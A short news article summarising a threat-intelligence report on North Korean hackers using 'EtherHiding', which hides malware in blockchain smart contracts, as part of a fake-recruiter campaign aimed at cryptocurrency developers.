North Korean Hackers’ New EtherHiding Crypto Heist
▼ Summary
– North Korean threat actors are using EtherHiding, a blockchain-based technique, to deliver malware for cryptocurrency theft.
– EtherHiding embeds malicious code in smart contracts, using the blockchain as a resilient command-and-control server that resists takedowns.
– This method is difficult to counter due to its decentralized nature, pseudonymous transactions, and the inability to remove code from deployed contracts.
– The campaign involves social engineering tactics, such as fake recruiters on platforms like Telegram, to target cryptocurrency developers and steal data.
– A multi-stage malware infection process using JADESNOW, BEAVERTAIL, and INVISIBLEFERRET compromises systems across Windows, macOS, and Linux.
A North Korean hacking group has adopted a sophisticated blockchain-based method called EtherHiding to distribute malware and steal cryptocurrency. This technique embeds harmful code directly into smart contracts on a decentralized blockchain, effectively turning the distributed ledger into a durable command-and-control server for malicious operations. Google’s Threat Intelligence Group recently confirmed this is the first instance they have documented of a nation-state actor using such a strategy.
EtherHiding presents major challenges for cybersecurity professionals because it resists conventional takedown and blocking tactics. Since the malicious payload resides on a decentralized, permissionless blockchain, there is no central server that authorities or security teams can disable. The pseudonymous nature of blockchain transactions also makes it extremely difficult to identify the attackers behind the scheme.
Another troubling aspect is that once a malicious smart contract is deployed, only its owner can remove or alter the code. Attackers can update the harmful payload at any moment, allowing them to adapt quickly even if security researchers flag the contract on blockchain scanning platforms. Furthermore, hackers can retrieve the malicious code using read-only calls that don’t appear in public transaction records, making their actions even harder to detect.
Google’s report describes EtherHiding as a move toward “next-generation bulletproof hosting,” where the core strengths of blockchain, decentralization and immutability, are repurposed for criminal use. This approach gives attackers a resilient infrastructure that traditional security measures struggle to counter.
The EtherHiding method is part of a broader social engineering effort tracked by Palo Alto Networks as ‘Contagious Interview.’ In this campaign, North Korean operatives use JADESNOW malware to deploy a JavaScript version of INVISIBLEFERRET, leading to multiple cryptocurrency thefts. The targets are primarily developers and professionals in the cryptocurrency and tech industries, with the goal of stealing sensitive data, digital assets, and maintaining long-term access to corporate systems.
Attackers pose as recruiters from fake companies, reaching out to potential victims on platforms like Telegram and Discord. They then deliver malware through what appear to be coding tests, software downloads, or technical interview materials. This multi-stage infection process, involving JADESNOW, BEAVERTAIL, and INVISIBLEFERRET, can compromise Windows, macOS, and Linux systems, demonstrating the campaign’s cross-platform reach and persistent threat to organizations worldwide.
(Source: Info Security)
